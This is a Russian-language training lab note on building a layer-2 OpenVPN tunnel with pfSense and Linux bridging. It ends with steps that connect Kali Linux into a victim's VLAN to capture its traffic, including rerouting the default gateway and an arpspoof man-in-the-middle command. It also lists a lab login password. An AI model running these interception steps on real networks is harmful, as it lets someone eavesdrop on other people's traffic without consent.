# 02.09.2021 VPN L2 Архитектура сети ![](https://i.imgur.com/sew2hyI.png) **настройка pfsense** логин admin пароль eve@123 | pfsense Добавляем интерфейсы ![](https://i.imgur.com/nP61txx.png) Переименовываем ![](https://i.imgur.com/V2c6kLB.png) Конфигурируем интерфейсы ![](https://i.imgur.com/BYs1Eta.png) В интерфейсе WAN должны быть отключены галочки ![](https://i.imgur.com/9o8JP22.png) правило:любой трафик разрешаем ![](https://i.imgur.com/VcCEny7.png) меняем архитектуру ![](https://i.imgur.com/6OvgCSg.png) вместо linux SRV может быть raspberry PI Подключение должно быть к trunk порту Linux SRV Должен быть Bridge. Для этого нужно установить bridge-utils (apt-get install bridge-utils) ![](https://i.imgur.com/OCUR5Dc.png) Так как настроек у интерфейсов нет и мы их бриджируем, то нужно указать manual - интерфейс поднимется, но без параметров, br0 - их бриджирует На win7 Проверим Bridge ![](https://i.imgur.com/BwS5M7T.png) откроем что-либо, например, сайт Переделываем L2 -> L3 Linux-Ext ip: 172.30.51.91/24 подключаемся по ssh **OpenVPN** Linux-Ext серверная часть VPN редактируем server.conf и перезапускаем OpenVPN ![](https://i.imgur.com/J6s3Bud.png) Linux SRV - клиентская часть OpenVPN меняем настрйки в client1.ovpn ![](https://i.imgur.com/1pHYaKF.png) и перезапускаем openvpn client1.ovpn после чего поднимается интерфейс tap0 ![](https://i.imgur.com/SmjZXnb.png) и нам нужно сделать бридж между ens3, ens4, tap0 ![](https://i.imgur.com/Qe3DDpi.png) далее нужно сделать, чтобы соединение стартовало автоматом: запуск Openvpn systemctl enable openvpn OpenVPN нужно сделать чтобы подхватил config корректируем конфиг: /etc/default/openvpn ![](https://i.imgur.com/bezgk6w.png) сделаем скрипт up.sh (исполняемым) ![](https://i.imgur.com/pJ1OYbS.png) затем client1.conf меняем так: ![](https://i.imgur.com/JoZffd3.png) можем tap0 задать адрес dhcp dhclient tap0 далее подключим kali Linux -> Linux Srv меняем client2.ovpn (dev tun -> dev tap) openvpn client2.ovpn добавим саб-интерфейсы для VLAN tap0.10 tap0.20 ![](https://i.imgur.com/Z0lUfR5.png) теперь можем смотреть на Kali весь трафик, который идет через Linux SRV проверка ping win 7 чтобы трафик весь пошел через нас нужно сменить def-gtw ![](https://i.imgur.com/sdpu7Dh.png) ip route delete default ip route add default via 192.168.10.254 (как gw у жертвы) делаем arp spoofing arpspoof -i tap0.10 -t 192.168.10.10 -r 192.168.10.254